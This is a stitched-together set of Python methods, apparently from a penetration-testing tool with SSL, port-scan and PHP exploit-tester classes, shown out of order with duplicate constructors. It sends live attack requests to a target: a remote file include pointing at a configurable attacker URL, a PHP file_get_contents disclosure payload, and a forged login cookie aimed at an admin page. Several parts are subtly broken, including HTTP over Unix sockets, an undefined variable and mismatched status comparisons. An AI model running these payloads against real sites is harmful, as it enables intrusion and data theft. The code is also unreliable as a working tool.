def ConnectionTest(self, host, port):
global PrintLog # Global functor for PrintLog.
PrintLog(
"Attempting to establish connection to {0}:{1}".format(host, port),
"Debug")
bSuccess = False
try:
lSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
lSock.connect((host, port))
lSock.close()
# Success!
self.m_result = self.SEC_SUCCESS
self.m_testResults['connection'] = self.SEC_SUCCESS
bSuccess = True
PrintLog(
"Successfully connected to {0}:{1}: PASS".format(host, port),
"Success")
except (IOError, OSError, socket.error, TypeError, ValueError) as err:
self.m_result = self.SEC_FAILURE
self.m_testResults['connection'] = self.SEC_FAILURE
PrintLog("{0} \033[1;34m{1}\033[0m".format(err, type(err)),
"Fatal")
return bSuccess
def _Util_GetHeaders(self, location, host, useSSL=False):
global PrintLog # Global functor for PrintLog
htHeaders = "HEAD {0} HTTP/1.1\r\nHost: {1}\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0\r\nConnection: keep-alive\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n\r\n".format(
location, host)
mData = ""
if htHeaders != "":
if useSSL == True:
try:
sslContext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslContext.options |= ssl.OP_NO_SSLv2
sslContext.options |= ssl.OP_NO_SSLv3
sslContext.load_default_certs()
sslContext.verify_mode = ssl.CERT_REQUIRED
sslContext.check_hostname = True
sslConn = sslContext.wrap_socket(socket.socket(
socket.AF_INET, socket.SOCK_STREAM),
server_hostname=host)
sslConn.connect((host, 443))
sslConn.sendall(htHeaders)
lOldSz = 0
lNewSz = 1
while (lNewSz - lOldSz) > 0:
lOldSz = lNewSz
mData += sslConn.recv(65535)
lNewSz = len(mData) - lOldSz
sslConn.close()
except (IOError, OSError, socket.error, ssl.SSLError) as err:
PrintLog("{0} \033[1;34m{1}\033[0m".format(err, type(err)),
"Fatal")
sys.exit(255)
else:
try:
httpSock = socket.socket(socket.AF_UNIX,
socket.SOCK_STREAM)
httpSock.connect((host, 80))
httpSock.sendall(htHeaders)
lOldSz = 0
lNewSz = 1
while (lNewSz - lOldSz) > 0:
lOldSz = lNewSz
mData += httpSock.recv(65535)
lNewSz = len(mData) - lOldSz
httpSock.close()
except (IOError, OSError, socket.error, ssl.SSLError) as err:
PrintLog("{0} \033[1;34m{1}\033[0m".format(err, type(err)),
"Fatal")
sys.exit(255)
return mData.split("\r\n")
def TestSSLValid(self, host, port=443):
PrintLog("Test SSL validation for {0}...".format(host), "Debug")
bSuccess = False
try:
if self.m_lastCrt == None or 0 == len(self.m_lastCrt):
sslContext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslContext.options |= ssl.OP_NO_SSLv2
sslContext.options |= ssl.OP_NO_SSLv3
sslContext.load_default_certs()
sslContext.verify_mode = ssl.CERT_REQUIRED
sslContext.check_hostname = True
sslConn = sslContext.wrap_socket(socket.socket(
socket.AF_INET, socket.SOCK_STREAM),
server_hostname=host)
sslConn.connect((host, port))
# Get the certificate.
self.m_lastCrt = sslConn.getpeercert()
sslConn.close()
# Get the current date.
epochStamp = dt.now().strftime("%s")
sslNotBefore = dt.strptime(self.m_lastCrt['notBefore'],
'%b %d %H:%M:%S %Y %Z').strftime("%s")
sslNotAfter = dt.strptime(self.m_lastCrt['notAfter'],
'%b %d %H:%M:%S %Y %Z').strftime("%s")
# Test the version.
if epochStamp > sslNotBefore and epochStamp < sslNotAfter:
PrintLog("SSL is Valid: PASS!", "Success")
self.m_result = self.SEC_SUCCESS
self.m_testResults['valid'] = self.SEC_SUCCESS
bSuccess = True
if self.m_lastHost == "" or self.m_lastHost == None:
self.m_lastHost = host
else:
PrintLog("SSL is Invalid/Expired: FAIL!", "Failure")
self.m_testResults['valid'] = self.SEC_FAILURE
self.m_lastHost = ""
self.m_lastCrt = None
except (IOError, OSError, socket.error, ssl.SSLError) as err:
if type(err) == ssl.SSLError or type(err) == socket.error:
PrintLog("SSL Connection: FAIL! ({0})".format(err), "Failure")
self.m_testResults['connection'] = self.SEC_FAILURE
self.m_lastHost = ""
self.m_lastCrt = None
else:
PrintLog("{0} \033[1;34m{1}\033[0m".format(err, type(err)),
"Fatal")
sys.exit(255)
return bSuccess
def TestSSLHash(self, host, port=443):
PrintLog("Test if SSL has weak signature for {0}...".format(host),
"Debug")
bSuccess = False
try:
sslContext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslContext.options |= ssl.OP_NO_SSLv2
sslContext.options |= ssl.OP_NO_SSLv3
sslContext.load_default_certs()
sslContext.verify_mode = ssl.CERT_REQUIRED
sslContext.check_hostname = True
sslConn = sslContext.wrap_socket(socket.socket(
socket.AF_INET, socket.SOCK_STREAM),
server_hostname=host)
sslConn.connect((host, port))
# Check to see if the SSL has a strong signature or not.
x509Cert = cryptography.x509.load_der_x509_certificate(
sslConn.getpeercert(True),
cryptography.hazmat.backends.openssl.backend)
sslConn.close()
if x509Cert.signature_hash_algorithm.name != "MD5" and x509Cert.signature_hash_algorithm.name != "SHA1":
PrintLog("SSL has strong hash in signature: PASS!", "Success")
self.m_result = self.SEC_SUCCESS
self.m_testResults['weak-sign'] = self.SEC_SUCCESS
bSuccess = True
if self.m_lastHost == "" or self.m_lastHost == None:
self.m_lastHost = host
else:
PrintLog("SSL has weak hash in signature: FAIL!", "Failure")
self.m_testResults['weak-sign'] = self.SEC_FAILURE
self.m_lastHost = ""
self.m_lastCrt = None
except (IOError, OSError, socket.error, ssl.SSLError) as err:
if type(err) == ssl.SSLError or type(err) == socket.error:
PrintLog("SSL Connection: FAIL! ({0})".format(err), "Failure")
self.m_testResults['connection'] = self.SEC_FAILURE
self.m_lastHost = ""
self.m_lastCrt = None
else:
PrintLog("{0} \033[1;34m{1}\033[0m".format(err, type(err)),
"Fatal")
sys.exit(255)
return bSuccess
def TestSSLSelfSign(self, host, port=443):
PrintLog("Test if SSL is self-signed for {0}...".format(host), "Debug")
bSuccess = False
try:
sslContext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslContext.options |= ssl.OP_NO_SSLv2
sslContext.options |= ssl.OP_NO_SSLv3
sslContext.load_default_certs()
sslContext.verify_mode = ssl.CERT_REQUIRED
sslContext.check_hostname = True
sslConn = sslContext.wrap_socket(socket.socket(
socket.AF_INET, socket.SOCK_STREAM),
server_hostname=host)
sslConn.connect((host, port))
# Get the certificate.
self.m_lastCrt = sslConn.getpeercert()
sslConn.close()
# Check to see if the SSL is self-signed or not.
if self.m_lastCrt['issuer'] != self.m_lastCrt[
'subject'] and 1 <= len(sslContext.get_ca_certs()):
PrintLog("SSL is not self-signed: PASS!", "Success")
self.m_result = self.SEC_SUCCESS
self.m_testResults['self-signed'] = self.SEC_SUCCESS
bSuccess = True
if self.m_lastHost == "" or self.m_lastHost == None:
self.m_lastHost = host
else:
PrintLog("SSL is self-signed: FAIL!", "Failure")
self.m_testResults['self-signed'] = self.SEC_FAILURE
self.m_lastHost = ""
self.m_lastCrt = None
except (IOError, OSError, socket.error, ssl.SSLError) as err:
if type(err) == ssl.SSLError or type(err) == socket.error:
PrintLog("SSL Connection: FAIL! ({0})".format(err), "Failure")
self.m_testResults['connection'] = self.SEC_FAILURE
self.m_lastHost = ""
self.m_lastCrt = None
else:
PrintLog("{0} \033[1;34m{1}\033[0m".format(err, type(err)),
"Fatal")
sys.exit(255)
return bSuccess
def InjectRemoteInclude(self,
host,
uri="/login",
method="get",
variable="username"):
global PrintLog # Global functor for PrintLog
bSuccess = False
# Perform a pre-request for testing.
lPrePage = self._Util_RetrievePage(host, uri="/index.php")
# Format the request.
htRequest = ""
htValue = "{0}://{1}/{2}".format(self.m_evilProto, self.m_evilUrl,
self.m_remoteInclude)
if method == "post":
htRequest = "{0} {1} HTTP/1.1\r\nHost: {4}\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0\r\nConnection: keep-alive\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n\r\n{2}={3}\r\n".format(
method.upper(), uri, variable, htValue, host)
else:
htRequest = "{0} {1}?{2}={3} HTTP/1.1\r\nHost: {4}\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0\r\nConnection: keep-alive\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n\r\n".format(
method.upper(), uri, variable, htValue, host)
if 200 != self._Util_SendRequest(htRequest, host, useSSL=True)[0]:
PrintLog("Site rejected injection: PASS!", "Success")
self.m_result = self.SEC_SUCCESS
self.m_testResults['remote_include'] = self.SEC_SUCCESS
bSuccess = True
else:
PrintLog(
"Site has accepted request, testing to see if it had an effect.",
"Debug")
lPostPage = self._Util_RetrievePage(host, uri="/index.php")
if lPrePage == lPostPage:
PrintLog("Site rejected include code injection: PASS!",
"Success")
self.m_result = self.SEC_SUCCESS
self.m_testResults['remote_include'] = self.SEC_SUCCESS
bSuccess = True
else:
PrintLog("Site accepted and RAN include code injection: FAIL!",
"Failure")
self.m_result = self.SEC_FAILURE
self.m_testResults['remote_include'] = self.SEC_FAILURE
return bSuccess
def __init__(self, proto="ftp"):
global PrintLog # Global functor for PrintLog
self.m_evilProto = proto
self.m_result = self.SEC_UNTESTED
self.m_testResults['remote_include'] = self.SEC_UNTESTED
PrintLog("PHP Exploit tester ready.", "Info")
def DiscloseLocalFile(self,
host,
uri="/login",
method="get",
variable="username",
file_path="file_get_contents('app.php') ?>"):
global PrintLog # Global functor for PrintLog
bSuccess = False
htRequest = ""
if method == "post":
htRequest = "{0} {1} HTTP/1.1\r\nHost: {4}\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0\r\nConnection: keep-alive\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n\r\n{2}={3}\r\n".format(
method.upper(), uri, variable, file_path, host)
else:
htRequest = "{0} {1}?{2}={3} HTTP/1.1\r\nHost: {4}\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0\r\nConnection: keep-alive\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n\r\n".format(
method.upper(), uri, variable, file_path, host)
lStatus, lHTML = self._Util_SendRequest(htRequest, host, useSSL=True)
if 200 != lStatus:
PrintLog("Site rejected injection: PASS!", "Success")
self.m_result = self.SEC_SUCCESS
self.m_testResults['local_disclosure'] = self.SEC_SUCCESS
bSuccess = True
else:
PrintLog(
"Site has accepted request, testing to see if it had an effect.",
"Debug")
if not re.match('^<\?php.*', lHTML, re.IGNORECASE):
PrintLog("Site rejected disclosure injection: PASS!",
"Success")
self.m_result = self.SEC_SUCCESS
self.m_testResults['local_disclosure'] = self.SEC_SUCCESS
bSuccess = True
else:
PrintLog("Site accepted and RAN disclosure injection: FAIL!",
"Failure")
self.m_result = self.SEC_FAILURE
self.m_testResults['local_disclosure'] = self.SEC_FAILURE
return bSuccess
def TestSSLCiphers(self, host, port=443):
PrintLog("Test for weak ciphers on {0}...".format(host), "Debug")
bSuccess = False
try:
sslContext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslContext.options |= ssl.OP_NO_SSLv2
sslContext.options |= ssl.OP_NO_SSLv3
sslContext.load_default_certs()
sslContext.verify_mode = ssl.CERT_REQUIRED
sslContext.check_hostname = True
# Some weak ass ciphers.
weakAssCiphers = "aNULL:MD5:DSS:RC4:SHA1:!HIGH"
sslContext.set_ciphers(weakAssCiphers)
sslConn = sslContext.wrap_socket(socket.socket(
socket.AF_INET, socket.SOCK_STREAM),
server_hostname=host)
sslConn.connect((host, port))
sslConn.close()
PrintLog("SSL ciphers are weak: FAIL! ({0})".format(err),
"Failure")
self.m_testResults['weak-cipher'] = self.SEC_FAILURE
self.m_lastHost = ""
self.m_lastCrt = None
except (IOError, OSError, socket.error, ssl.SSLError) as err:
if type(err) == ssl.SSLError:
PrintLog("SSL ciphers are strong: PASS!", "Success")
self.m_result = self.SEC_SUCCESS
self.m_testResults['weak-cipher'] = self.SEC_SUCCESS
bSuccess = True
if self.m_lastHost == "" or self.m_lastHost == None:
self.m_lastHost = host
else:
PrintLog("{0} \033[1;34m{1}\033[0m".format(err, type(err)),
"Fatal")
sys.exit(255)
return bSuccess
def __init__(self):
global PrintLog # Global functor for PrintLog.
# Setup the defaults.
self.m_result = self.SEC_UNTESTED
self.m_testResults = {
'connection': self.SEC_UNTESTED,
'port': self.SEC_UNTESTED,
'icmp': self.SEC_UNTESTED
}
PrintLog("Network Pen-Tester ready.", "Info")
def TestSSLConnection(self, host, port=443):
PrintLog(
"Attempting to test SSL connection to {0}:{1}...".format(
host, port), "Debug")
bSuccess = False
try:
sslContext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslContext.options |= ssl.OP_NO_SSLv2
sslContext.options |= ssl.OP_NO_SSLv3
sslContext.load_default_certs()
sslContext.verify_mode = ssl.CERT_REQUIRED
sslContext.check_hostname = True
sslConn = sslContext.wrap_socket(socket.socket(
socket.AF_INET, socket.SOCK_STREAM),
server_hostname=host)
sslConn.connect((host, port))
sslConn.close()
PrintLog("SSL Connection: PASS!", "Success")
bSuccess = True
self.m_result = self.SEC_SUCCESS
self.m_testResults['connection'] = self.SEC_SUCCESS
self.m_lastHost = host
except (IOError, OSError, socket.error, ssl.SSLError) as err:
if type(err) == ssl.SSLError or type(err) == socket.error:
PrintLog("SSL Connection: FAIL! ({0})".format(err), "Failure")
self.m_testResults['connection'] = self.SEC_FAILURE
self.m_lastHost = ""
self.m_lastCrt = None
else:
PrintLog("{0} \033[1;34m{1}\033[0m".format(err, type(err)),
"Fatal")
sys.exit(255)
return bSuccess
def TestSSLVersion(self, host, port=443):
PrintLog("Test SSL version for {0}...".format(host), "Debug")
bSuccess = False
try:
if self.m_lastCrt == None or 0 == len(self.m_lastCrt):
sslContext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslContext.options |= ssl.OP_NO_SSLv2
sslContext.options |= ssl.OP_NO_SSLv3
sslContext.load_default_certs()
sslContext.verify_mode = ssl.CERT_REQUIRED
sslContext.check_hostname = True
sslConn = sslContext.wrap_socket(socket.socket(
socket.AF_INET, socket.SOCK_STREAM),
server_hostname=host)
sslConn.connect((host, port))
# Get the certificate.
self.m_lastCrt = sslConn.getpeercert()
sslVer = sslConn.version()
sslConn.close()
# Test the version.
if self.m_lastCrt['version'] >= 2 and sslVer != "SSLv3":
PrintLog("SSL Version is >=2: PASS!", "Success")
self.m_result = self.SEC_SUCCESS
self.m_testResults['version'] = self.SEC_SUCCESS
self.m_testResults['SSLv3'] = self.SEC_SUCCESS
bSuccess = True
if self.m_lastHost == "" or self.m_lastHost == None:
self.m_lastHost = host
else:
PrintLog("SSL Version is <2: FAIL!", "Failure")
self.m_testResults['version'] = self.SEC_FAILURE
self.m_testResults['SSLv3'] = self.SEC_FAILURE
self.m_lastHost = ""
self.m_lastCrt = None
except (IOError, OSError, socket.error, ssl.SSLError, KeyError) as err:
if type(err) == ssl.SSLError or type(err) == socket.error:
PrintLog("SSL Connection: FAIL! ({0})".format(err), "Failure")
self.m_testResults['connection'] = self.SEC_FAILURE
self.m_lastHost = ""
self.m_lastCrt = None
elif type(err) == KeyError:
PrintLog(
"Unable to find key {0}! Check debug for more info!".
format(err), "Critical", "{0}".format(self.m_lastCrt))
sys.exit(2)
else:
PrintLog("{0} \033[1;34m{1}\033[0m".format(err, type(err)),
"Fatal")
sys.exit(255)
return bSuccess
def __init__(self):
global PrintLog # Global functor for PrintLog.
# Setup the defaults.
self.m_result = self.SEC_UNTESTED
self.m_testResults = {
'connection': self.SEC_UNTESTED,
'version': self.SEC_UNTESTED,
'self-signed': self.SEC_UNTESTED,
'valid': self.SEC_UNTESTED,
'weak-cipher': self.SEC_UNTESTED,
'SSLv3': self.SEC_UNTESTED,
'key-size': self.SEC_UNTESTED,
'weak-sign': self.SEC_UNTESTED
}
PrintLog("SSL Pen-Tester ready.", "Info")
def IcmpTest(self, host):
global PrintLog # Global functor for PrintLog.
if sys.version_info[0] < 3:
PrintLog("Checking for ICMP echo...", "Debug")
bSuccess = False
try:
icmpResp = pyping.ping(host)
if None != icmpResp.max_rtt:
PrintLog("ICMP responding!", "Failure")
self.m_result = self.SEC_FAILURE
self.m_testResults['icmp'] = self.SEC_FAILURE
else:
PrintLog("ICMP dropped: PASS!", "Success")
self.m_result = self.SEC_SUCCESS
self.m_testResults['icmp'] = self.SEC_SUCCESS
bSuccess = True
except (IOError, OSError, socket.error, TypeError,
ValueError) as err:
if type(err) == socket.error or type(err) == socket.timeout:
PrintLog("ICMP not available!", "Failure")
self.m_result = self.SEC_FAILURE
self.m_testResults['icmp'] = self.SEC_FAILURE
else:
PrintLog("{0} \033[1;34m{1}\033[0m".format(err, type(err)),
"Fatal")
sys.exit(255)
else:
PrintLog(
"Version of Python (python>=3) doesn't suppot PyPing! Assuming OK (please check manually)",
"Success")
self.m_result = self.SEC_SUCCESS
self.m_testResults['icmp'] = self.SEC_SUCCESS
bSuccess = True
return bSuccess
def SpoofCookies(self, host, uri="/login", secure_uri="admin"):
global PrintLog # Global functor for PrintLog
bSuccess = False
# Grab the headers of the URI.
lHeaders = self._Util_GetHeaders(uri, host, useSSL=True)
lCookies = ""
htRequest = "GET {0} HTTP/1.1\r\nHost: {1}\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0\r\nConnection: keep-alive\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n".format(
secure_uri, host)
for field in lHeaders:
if re.match('^Cookie:\s(.*)$', field, re.IGNORECASE):
lCookies = re.search('^Cookie:\s(.*)$', field,
re.IGNORECASE).group(1)
break
if lCookies != "":
lCookies = lCookies.split(";")
# Scrape through the cookies and look for "login".
for cookie in lCookies:
lKey = cookie.split("=")[0]
lValue = cookie.split("=")[1]
if re.match('.*login.*', lKey, re.IGNORECASE):
# Inspect the value and attempt a spoof.
if re.match('^(0|1)$', lValue, re.IGNORECASE):
htRequest = "{0}Cookie: {1}={2};\r\n\r\n".format(
htRequest, lKey, "1")
elif re.match('^(t(rue)?|f(alse)?)$', lValue,
re.IGNORECASE):
htRequest = "{0}Cookie: {1}={2};\r\n\r\n".format(
htRequest, lKey, "true")
else:
htRequest = ""
if htRequest != "":
# Attempt the query!
if 200 != self._Util_SendRequest(htRequest, host,
useSSL=True)[0]:
PrintLog("Site rejected cookie spoof injection: PASS!",
"Success")
self.m_result = self.SEC_SUCCESS
self.m_testResults['remote_include'] = self.SEC_SUCCESS
bSuccess = True
else:
PrintLog(
"Site accepted and RAN cookie spoof injection: FAIL!",
"Failure")
self.m_result = self.SEC_FAILURE
self.m_testResults['remote_include'] = self.SEC_FAILURE
else:
PrintLog(
"Not able to test cookie spoofing as there are no cookies! Defaulting to SUCCESS",
"Success")
self.m_result = self.SEC_SUCCESS
self.m_testResults['cookies'] = self.SEC_SUCCESS
bSuccess = True
return bSuccess
def PortTest(self,
host,
port_list=[443, 587, 993, 995, 8080],
full_range=False):
global PrintLog # Global functor for PrintLog.
PrintLog("Scanning for unwanted ports...", "Debug")
bSuccess = False
try:
if full_range == True:
PrintLog("Scanning ALL 65,535 ports!", "Debug")
else:
PrintLog("Scanning ports {0}".format(port_list), "Debug")
unwantedPorts = [25, 26, 80, 110, 143, 3306, 5432]
for port in unwantedPorts:
if port in port_list:
PrintLog(
"Skipping potentially unsafe port: {0}".format(
port), "Warning")
continue
else:
# Scan this port.
try:
lSock = socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
lSock.settimeout(1.0)
lSock.connect((host, port))
lSock.close()
PrintLog(
"Port {0} is open on {1}".format(port, host),
"Failure")
self.m_result = self.SEC_FAILURE
self.m_testResults['port'] = self.SEC_FAILURE
break
except (IOError, OSError, socket.error, socket.timeout,
TypeError, ValueError) as err:
if type(err) == socket.error or type(
err) == socket.timeout:
PrintLog(
"Port {0} is NOT open on {1}".format(
port, host), "Success")
else:
PrintLog(
"{0} \033[1;34m{1}\033[0m".format(
err, type(err)), "Fatal")
sys.exit(255)
if self.m_result != self.SEC_FAILURE and self.m_testResults[
'port'] != self.SEC_FAILURE:
PrintLog("Port scan complete: PASS!", "Success")
self.m_result = self.SEC_SUCCESS
self.m_testResults['port'] = self.SEC_SUCCESS
bSuccess = True
except (IOError, OSError, socket.error, TypeError, ValueError) as err:
self.m_result = self.SEC_FAILURE
self.m_testResults['port'] = self.SEC_FAILURE
PrintLog("{0} \033[1;34m{1}\033[0m".format(err, type(err)),
"Fatal")
return bSuccess
def _Util_SendRequest(self, headers, host, useSSL=False):
global PrintLog # Global functor for PrintLog
lStatus = 404
lHTML = ""
mData = ""
if headers != "":
if useSSL == True:
try:
sslContext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslContext.options |= ssl.OP_NO_SSLv2
sslContext.options |= ssl.OP_NO_SSLv3
sslContext.load_default_certs()
sslContext.verify_mode = ssl.CERT_REQUIRED
sslContext.check_hostname = True
sslConn = sslContext.wrap_socket(socket.socket(
socket.AF_INET, socket.SOCK_STREAM),
server_hostname=host)
sslConn.connect((host, 443))
sslConn.sendall(headers)
lOldSz = 0
lNewSz = 1
while (lNewSz - lOldSz) > 0:
lOldSz = lNewSz
mData += sslConn.recv(65535)
lNewSz = len(mData) - lOldSz
sslConn.close()
except (IOError, OSError, socket.error, ssl.SSLError) as err:
PrintLog("{0} \033[1;34m{1}\033[0m".format(err, type(err)),
"Fatal")
sys.exit(255)
else:
try:
httpSock = socket.socket(socket.AF_UNIX,
socket.SOCK_STREAM)
httpSock.connect((host, 80))
httpSock.sendall(headers)
lOldSz = 0
lNewSz = 1
while (lNewSz - lOldSz) > 0:
lOldSz = lNewSz
mData += httpSock.recv(65535)
lNewSz = len(mData) - lOldSz
httpSock.close()
except (IOError, OSError, socket.error, ssl.SSLError) as err:
PrintLog("{0} \033[1;34m{1}\033[0m".format(err, type(err)),
"Fatal")
sys.exit(255)
# Parse the data.
if re.match('^HTTP\/[0-9]\.[0-9]\s([0-9]{3})\s.*', mData,
re.IGNORECASE):
lRegExp = re.search(
'^HTTP\/[0-9]\.[0-9]\s([0-9]{3})\s.*\r\n\r\n(.*)$', mData)
if lRegExp != None:
lStatus = lRegExp.group(1)
lHTML = lRegExp.group(2)
else:
PrintLog("Was unable to parse HTTP return!", "Critical")
sys.exit(255)
return (lStatus, lHTML)
